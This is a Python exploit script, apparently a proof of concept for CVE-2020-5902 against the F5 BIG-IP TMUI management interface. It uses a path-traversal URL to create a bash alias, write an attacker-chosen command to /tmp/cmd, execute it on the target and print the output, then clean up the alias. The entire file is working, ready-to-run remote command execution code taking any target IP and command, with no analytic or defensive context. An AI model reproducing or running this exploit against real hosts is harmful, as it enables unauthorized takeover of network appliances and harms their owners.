cve-2020-5902.py

#!/usr/bin/env python3
import re,sys,argparse,requests,urllib3
from time import sleep
from datetime import datetime
from pprint import pprint
from threading import Thread, activeCount

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def getTime():
    now = datetime.now()
    return now.strftime('%H:%M:%S')

def showInfo(message):
    print('[\033[1;94m{}\033[0;m] [*] {}'.format(getTime(), message))

def showFail(message):
    print('[\033[1;94m{}\033[0;m] [\033[1;91m-\033[0;m] \033[1;91m{}\033[0;m'.format(getTime(), message))

def showSuccess(message):
    print('[\033[1;94m{}\033[0;m] [\033[1;92m+\033[0;m] \033[1;92m{}\033[0;m'.format(getTime(), message))

def exit(message = None):
    try:
        if message is not None:
            showFail(message)
        if activeCount() > 1:
            showInfo('Killing all threads')
            while activeCount() > 1:
                sleep(0.001)
        showInfo('Exiting script')
        sys.exit()
    except KeyboardInterrupt:
        pass

def rce(ip, port, cmd):
    try:
        url1 = 'https://{}:{}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash'
        url2 = 'https://{}:{}/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/cmd&content={}'
        url3 = 'https://{}:{}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/cmd'
        url4 = 'https://{}:{}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list'

        requests.get(url1.format(ip, port), verify=False, timeout=5)
        requests.get(url2.format(ip, port, cmd), verify=False, timeout=5)

        r = requests.get(url3.format(ip, port), verify=False, timeout=5)
        p = r.text

        print(p)

        requests.get(url4.format(ip, port), verify=False, timeout=5)

    except KeyboardInterrupt:
        exit('User aborted!')
    except Exception as e:
        showFail('{} : {} is not vulnerable'.format(ip, port))

def main(args):
    try:
        showInfo('Starting scanning')

        ip = args.target
        port = args.port
        cmd = args.cmd

        rce(ip,port,cmd)

        while activeCount() > 1:
            sleep(0.001)
        exit('Scan ended')
    except Exception as e:
        exit(e)

if __name__ == '__main__':
    try:
        # Declare an argparse variable to handle application command line arguments
        parser = argparse.ArgumentParser()
        parser.add_argument("-t", "--target", action="store", help="Target IP Address", required=True)        
        parser.add_argument("-p", "--port", action="store", help="Target Port", default=443)
        parser.add_argument("-c", "--cmd", action="store", help="Command to execute", default="id")

        args = parser.parse_args() 

        if len(sys.argv[1:])==0:
            parser.print_help()        
            parser.exit()

        main(args)
    except KeyboardInterrupt:
        exit('User aborted!')